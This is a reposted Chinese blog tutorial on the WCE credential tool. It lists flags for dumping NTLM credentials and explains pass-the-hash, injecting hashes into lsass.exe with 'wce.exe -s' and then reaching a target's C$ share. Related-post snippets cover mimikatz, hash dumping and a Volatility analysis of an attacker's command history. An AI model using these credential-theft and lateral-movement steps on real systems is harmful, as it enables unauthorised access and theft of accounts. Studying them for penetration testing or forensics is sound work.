WCE Windows hash抓取工具 教程

最新推荐文章于 2025-04-09 09:20:18 发布
最新推荐文章于 2025-04-09 09:20:18 发布
阅读量7.3k 收藏 4
点赞数 1
分类专栏: Tools 文章标签: web安全工具使用

WCE 下载地址:链接:My 微云
工具界面
1.通过cmd命令打开,输入 cd wce所在目录,进入wce界面
在这里插入图片描述
2.wce.exe -l 列出登录的会话和NTLM凭据(默认值)
在这里插入图片描述
3.wce.exe -g 生成LM和NT的哈希 参数<密码>
在这里插入图片描述
4.
wce.exe --s 修改当前登录会话的NTLM凭据 参数:<用户名>:<域名>:<LM哈希>:<NT哈希>
在这里插入图片描述
5.
-l 列出登录的会话和NTLM凭据(默认值)
-s 修改当前登录会话的NTLM凭据 参数:<用户名>:<域名>:<LM哈希>:<NT哈希>
-r 不定期的列出登录的会话和NTLM凭据,如果找到新的会话,那么每5秒重新列出一次
-c 用一个特殊的NTML凭据运行一个新的会话 参数:
-e 不定期的列出登录的会话和NTLM凭据,当产生一个登录事件的时候重新列出一次
-o 保存所有的输出到一个文件 参数:<文件名>
-i 指定一个LUID代替使用当前登录会话 参数:
-d 从登录会话中删除NTLM凭据 参数:
-a 使用地址 参数: <地址>
-f 强制使用安全模式
-g 生成LM和NT的哈希 参数<密码>
-K 缓存kerberos票据到一个文件(unix和windows wce格式)
-k 从一个文件中读取kerberos票据并插入到windows缓存中
-w 通过摘要式认证缓存一个明文的密码
-v 详细输出

#6.
-s参数可以用来hash注入。
hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去,使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。至于目标机器的本地或者是域用户hash如何取得那就要发挥你自己的想象力了。hash注入本身是为了对付那些破解不了的NTHASH。
具体的命令格式如下:
wce.exe -s 用户名:对方机器名或者ip:LM-HASH:NT-HASH
当提示注入成功的时候,这时候键入net use命令并没有看到有连接,其实已经可以连接了,直接使用ipc命令操作对方的机器就可以了。dir \ip地址\c$
其次域里的域用户hash也可以使用wce进行注入,只需要把命令格式变一变就行
wce.exe -s 用户名:域名:LM-HASH:NT-HASH
~~转载于网络

Windows下登录凭证窃取技巧
10-09 4万+
拿到一台Windows服务器权限,收集各种登录凭证以便扩大战果。本篇分享几个窃取Windows登录凭证的技巧和工具。 1、Windows 本地密码Hash Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hashWindows系统下hash密码格式用户名称:RID:LM-HASH值:NT-HASH值。 例如: Admin...
Windows密码哈希值获取工具
AI
06-07 1498
mimikatz是法国人Benjamin开发的一款功能强大的轻量级调试工具,本意是用来进行个人测试的,但由于其功能强大,能够直接读取Windows操作系统的明文密码,因而闻名于渗透测试领域,可以说是渗透必备工具。这些功能在内网渗透中能够被利用,例如在Windows平台上执行绕过Hash或从内存中获取NT/LM hashes(也可以从交互式登录、服务、远程桌面连接中获取 ),以用于进一步的攻击,而且它的体积也非常小,是内网渗透必备工具。通过下载或直接执行该ps脚本即可获取Windows密码。
如何使用wce进行hash注入
weixin_30367543的博客
09-06 343
在内网渗透时,很经常会碰到好不容易提取出了hash,但是无法破解。 wce号称内网渗透神器,其中有一个功能就是hash注入。 测试环境: 目标 windows2008 【192.168.200.128】hash如下: 测试机: windows7【192.168.200.5】 在无法破解192.168.200.128的administrator密码时,我们可以采用hash注入 先...
wce:一款强大的Windows凭证编辑工具
最新发布
gitblog_00103的博客
04-09 834
wce:一款强大的Windows凭证编辑工具 wce Windows Credentials Editor v1.3beta 项目地址: https://gitcode.com/gh_mirrors/wce/wce ...
Windows 用户登录凭证管理
08-07
Window 10 用户凭证 管理,用户凭证保存位置,如何更改密码?更改登录域?
wce Windows hash抓取工具教程
09-19
wce Windows hash抓取工具 提权 Widnows7以下可以直接抓取系统明文 含有32和64位
windows查看凭证
空白画布
05-10 3436
请注意,具体步骤可能会根据Windows版本和安装的应用程序有所不同。如果你需要具体的代码示例,请提供更多的上下文信息,例如你正在使用的操作系统版本、需要查看凭证的具体类型等。在Windows中查看凭证通常指的是查看保存的登录信息,如网络凭证、账户密码等。这些信息可能被保存在不同的地方,如Windows凭证管理器、控制面板或者是浏览器的保存数据中。
WCE 抓取工具 hash
06-02
**Windows CE 模拟器(WCE)与 Hash 抓取工具** Windows CE(Windows Embedded Compact)是一种由微软开发的嵌入式操作系统,主要用于小型设备,如掌上电脑、工业设备和汽车信息娱乐系统等。它是一个精简版的...
WCE抓取工具hash值解析与应用
WCEWindows Credentials Editor)是一款著名的安全工具,由著名黑客技术作家、安全研究人员Didier Stevens开发。它主要用于在Windows操作系统上收集和管理凭据,特别是那些以明文存储的密码。WCE可以运行在所有...
3.12-Windows其他类型抓取NTLMHASH工具
qq_38122566的博客
03-12 611
打开GetPass工具所在的目录。打开命令行环境。运行64位程GetPassword。运行该程序后,即可获得明文密码。
关于64位windows系统HASH抓取.pdf
12-22
随着 Windows Vista 版本的发布,Microsoft 已经不再保存 LM Hash,这使得传统的 Hash 抓取工具如 PwDump、Gsecdump、WCE、Gethash 等全部失效。那么,如何在 64 位 Windows 系统中抓取 Hash 呢? 首先,我们需要...
windows登录凭据批处理导入
11-14
免去维护奔波,一个批处理搞定,添加登录凭据,解决文件共享、打印机共享,smb文档服务,无法访问的种种反复出现的问题
WCE注入工具
05-24
WIN 2008环境下,用WCE获取管理员密码
Windows 哈希值抓取方法详解
m0_57836225的博客
09-25 1211
Windows 系统中,用户密码通常以哈希值的形式存储在本地或域控制器上。哈希值是通过对密码进行特定的哈希算法计算得到的,具有不可逆性,即无法通过哈希值直接推导出原始密码。了解如何抓取 Windows 哈希值对于网络安全研究和攻击检测非常重要。本文介绍了几种常见的抓取 Windows 哈希值的方法,包括使用 Mimikatz、Hashdump 和 Metasploit。在使用这些工具时,要注意合法性和安全性,确保操作在合法的范围内进行。
登录凭证------
Yan的博客
03-10 1063
为什么需要登录凭证?web开发中,我们使用的协议http是无状态协议,http每次请求都是一个单独的请求,和之前的请求没有关系,服务器就不知道上一步你做了什么操作,我们需要一个办法证明我没登录过。
内网渗透(二十七)之Windows协议认证和密码抓取-Windows其他类型抓取NTLM HASH工具
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-14 305
打开GetPass工具所在的目录,打开命令行环境,运行64位程GetPassword,运行该程序后,即可获得明文密码。这款工具是一款Hash注入神器,不仅可以用于Hash注入,也可以直接获取明文或Hash。这款工具也分为32位和。在命令行环境中运行PwDump7程序,会生成一个记事本,可以得到系统中所有账户的NTLMHash。nishang中的 GET-PASSHashes.ps1可以可以获取hash。下载QuarksPwDump.exe,在命令行环境中输人。可以导出用户的NLM Hash
使用 Windows 凭据自动登录 Web 应用程序
D0126_的博客
09-03 513
在一个公司内部的局域网上,存在着各种不需要显式登录的 Web 应用程序。用户只需要登录 Windows 即可完成身份验证。用户希望了解这种身份验证是如何实现的,以及如何在 Python 和 Django 中使用 Windows 登录信息对用户进行身份验证。该过程需要考虑安全性和实现方式的限制,例如浏览器要求、应用程序和公司内部网后端的位置等。
内网渗透-windows获取(本地、域、Ntds.dit)登录凭证实战手法总结(超详细)
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-03 2150
当获取一台域内主机权限时,接下来的渗透思路就是要获取更高权限的账号,用来访问域控或横向拓展,那么在获取本地用户、域用户凭证和获取域控Ntds.dit这一块就极其重要,将详细介绍红队渗透中使用获取登录凭证的手法。
msf生成木马抓取hash
z65535的博客
04-21 687
结果显示:利用bypassuac漏洞模块对目标主机发起了攻击,成功绕过UAC限制,“Meterpreter session 2 opened ”–表明已经开通了192.168.88.132:4444和192.168.88.137:64588的新会话连接2。5.先用background把当前会话挂起,切换到msf目录下使用bupassuac模块来绕过uac的限制(这个方法比较看运气有可能成功,也有可能失败,需要多试几次),结果可以看到返回了多条可利用的漏洞模块信息。4.尝试提权(还是不行,接着在换个方法)
ProcessHandle:0×60 Cmd #0 at Oxe6030:cd C:\Users Cmd #1 at O×e6ea8:dir Cmd #2 at o×ee3d0:wce.exe -W>gideon/w.tmp Cmd #3 at o×e0170:who ami Cmd #4-at Oxe0188:whoami0×ea3c8:net use z:\\10.1.1.2\c$ Cmd #5 at Cmd #6 at0×e01b8:cd z: Cmd #7 at Oxe6ed8:dir0xe6070:cd gideon Cmd #8 atCmd #9 at O×e6ef8:dir Cmd #10 at O×e6f08:z: Cmd#11at O×e6f18:dirat 0×f2418:copy c:\users\gideon\rar.exe z:\crownjewel Cmd#12#13at OxeOcb8:cd crownjewels Cmd Cmd#14at Oxe6f28:dir#15at O×e6f38:rarCmd Cmd #16 at O×f2478:rar crownjewlez.rar *.txt -hp123qwe!@# Cmd #17 at O×f24d0:rar a -hp123!@#qwe crownjewlez.rar *.txtScreen这个结果是用volatility2什么插件分析出来的?
04-07
<think>好的,用户的问题是关于Volatility2插件,特别是用于分析命令历史记录的,提到的插件包括ProcessHandle、Cmd、whoami、net、use、rar等。首先,我需要回忆Volatility2的常用插件和功能。 首先,Volatility是一个内存取证工具,用于分析内存转储文件。用户提到的命令历史分析通常涉及检查进程的内存中的命令行参数或控制台缓冲区。常见的插件有cmdscan和consoles,这两个插件可以提取Windows系统中的命令历史记录。例如,cmdscan会扫描命令提示符进程的内存,提取执行的命令。而consoles则针对控制台应用程序,如cmd.exe,提取输入的命令。 接下来,用户提到的ProcessHandle可能是指处理进程句柄的插件,但Volatility2中并没有直接叫ProcessHandle的插件。可能用户记错了名字,或者指的是处理进程相关信息的插件,比如pslist、pstree、handles等。handles插件可以列出进程打开的句柄,但需要结合其他信息来分析。 关于Cmd、whoami、net、use、rar这些命令,用户可能希望找到这些命令在内存中的执行痕迹。这时候,cmdscan和consoles插件确实有用,因为它们可以显示出在cmd.exe中运行过的命令,比如whoami、net use等。此外,malfind插件可以检测隐藏或注入的代码,可能有助于发现恶意使用的rar等压缩工具。 另外,用户可能还需要使用pslist或pstree来查看运行的进程,结合dlllist查看加载的DLL,或者使用filescan查找内存中的文件对象,比如rar文件。envars插件可以查看环境变量,有时候也能提供线索。 需要确认用户提到的插件是否存在,比如在Volatility2的插件列表中,确实有cmdscan、consoles、handles、pslist等。但ProcessHandle可能是指handles插件,或者是用户混淆了插件名称。因此,在回答时需要指出正确的插件名称和功能,并建议用户使用cmdscan和consoles来提取命令历史,同时结合其他插件如malfind、filescan进行进一步分析。 最后,用户可能需要具体的命令示例,比如volatility -f memory.dump --profile=Win7SP1x64 cmdscan,这样他们可以直接应用。同时,提醒用户根据正确的配置文件(profile)选择,以及可能需要使用hashdump或mimikatz插件来提取凭证信息,如果涉及到net use等网络共享命令的话。</think>根据您提到的关键词,Volatility2中分析命令历史记录的常用插件和功能如下: ### 一、核心插件说明 1. **cmdscan插件** - 提取$CONSOLE_INFO_CLASS结构体数据,可获取CMD.EXE的命令历史记录 - 支持Windows XP到Windows 7系统 - 示例输出包含进程ID、命令缓冲区地址、命令内容等字段[^1] 2. **consoles插件** - 解析_CONSOLE_INFORMATION结构体 - 可恢复控制台应用程序的输入历史(包括cmd.exe) - 支持Windows 8/10系统命令历史提取 ```bash volatility -f memory.dump --profile=Win7SP1x64 cmdscan ``` ### 二、关联分析方法 1. **进程分析组合技** - `pslist`+`dlllist`定位可疑进程 - `handles -p <PID>`查看进程句柄 - `malfind`检测代码注入痕迹 2. **文件痕迹追踪** - 使用`filescan`搜索rar/压缩包文件对象 - 通过`dumpfiles`提取文件内容 - 示例:`grep -iE "\.rar|\.zip" filescan.txt` ### 三、网络行为关联 1. **网络连接分析** - `netscan`查看TCP/UDP连接 - `sockets`显示套接字信息 - 结合`netstat -an`比对实时状态 2. **用户凭证提取** - 使用`hashdump`获取系统哈希 - `mimikatz`插件提取明文密码 - 特别适用于分析`net use`等网络命令的认证信息
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值